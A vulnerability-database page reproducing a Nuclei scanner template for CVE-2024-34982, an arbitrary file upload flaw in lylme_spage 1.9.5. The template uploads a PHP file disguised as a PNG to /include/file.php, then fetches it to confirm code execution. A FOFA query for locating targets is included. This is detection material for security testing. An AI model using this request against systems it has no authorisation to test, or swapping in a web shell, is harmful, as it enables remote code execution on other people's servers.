Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
nucleiProjectDiscoveryNUCLEI:CVE-2024-34982
HistoryJun 18, 2024 - 7:04 a.m.

LyLme-Spage - Arbitary File Upload

2024-06-1807:04:32
ProjectDiscovery
github.com
4
lylme-spage
arbitrary file upload
cve2024
rce
www
file upload vulnerability

7.7 High

AI Score

Confidence

High

JSON
An arbitrary file upload vulnerability in the component /include/file.php of lylme_spage v1.9.5 allows attackers to execute arbitrary code via uploading a crafted file.

id: CVE-2024-34982

info:
  name: LyLme-Spage - Arbitary File Upload
  author: DhiyaneshDk
  severity: high
  description: |
    An arbitrary file upload vulnerability in the component /include/file.php of lylme_spage v1.9.5 allows attackers to execute arbitrary code via uploading a crafted file.
  reference:
    - https://github.com/n2ryx/CVE/blob/main/Lylme_pagev1.9.5.md
    - https://github.com/tanjiti/sec_profile
    - https://github.com/ATonysan/poc-exp/blob/main/60NavigationPage_CVE-2024-34982_ArbitraryFileUploads.py
  metadata:
    verified: true
    max-request: 1
    fofa-query: icon_hash="-282504889"
  tags: cve,cve2024,lylme-spage,rce,intrusive

flow: http(1) && http(2)

variables:
  string: "{{randstr}}"
  filename: "{{to_lower(rand_text_alpha(5))}}"

http:
  - raw:
      - |
        POST /include/file.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=---------------------------575673989461736

        -----------------------------575673989461736
        Content-Disposition: form-data; name="file"; filename="{{filename}}.php"
        Content-Type: image/png

        <?php echo "{{string}}";unlink(__FILE__);?>
        -----------------------------575673989461736--

    matchers-condition: and
    matchers:
      - type: word
        words:
          - '"code":'
          - '"msg":'
          - 'php"}'
        condition: and

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        name: path
        part: body
        group: 1
        regex:
          - '"url":"([/a-z_0-9.]+)"'
        internal: true

  - raw:
      - |
        GET {{path}} HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "{{string}}" )'
          - 'contains(header, "text/html")'
        condition: and
# digest: 4a0a004730450220440784f1e1d309bfb1eee99fbcaf02afe7bfa185b48f07233df0f14cac9e9d9b0221009072b53098bb58d0d3efd14db1a3fc5f7b0b4593a0426fa060db0c42edd6f029:922c64590222798bb761d5b6d8e72950

Related

nvd 1
cve 1
cvelist 1
nvd
nvd
CVE-2024-34982
2024-05-17 14:15:11
cve
cve
CVE-2024-34982
2024-05-17 14:15:11
cvelist
cvelist
CVE-2024-34982
1976-01-01 00:00:00

7.7 High

AI Score

Confidence

High

JSON
Related for NUCLEI:CVE-2024-34982
nvd1cve1cvelist1